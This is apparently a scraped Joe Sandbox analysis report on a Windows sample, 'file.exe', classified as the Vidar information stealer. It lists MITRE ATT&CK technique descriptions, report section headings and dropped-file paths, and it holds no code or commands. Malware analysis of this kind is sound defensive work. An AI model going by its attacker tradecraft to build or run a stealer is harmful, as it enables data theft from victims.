Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DAAFIIJDAAAAKFHIDAAAKJJEGD

C:\ProgramData\EBKJDBAAKJDGCBFHCFCG

C:\ProgramData\EGDGCGCF

C:\ProgramData\EGDGCGCFHIEHIDGDBAAE

C:\ProgramData\HDBGHDHC

C:\ProgramData\HIDHIEGI

C:\ProgramData\JDGCGDBG

C:\ProgramData\KFBFCAFCBKFI\freebl3.dll

C:\ProgramData\KFBFCAFCBKFI\mozglue.dll

C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll

C:\ProgramData\KFBFCAFCBKFI\nss3.dll

C:\ProgramData\KFBFCAFCBKFI\softokn3.dll

Windows Analysis Report
file.exe

Function 00249210 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211
COMMON

Function 002CF70E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183
COMMON

Function 002C97DC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
fileCOMMON

Function 002C9B02 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
fileCOMMON

Function 002CF4C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre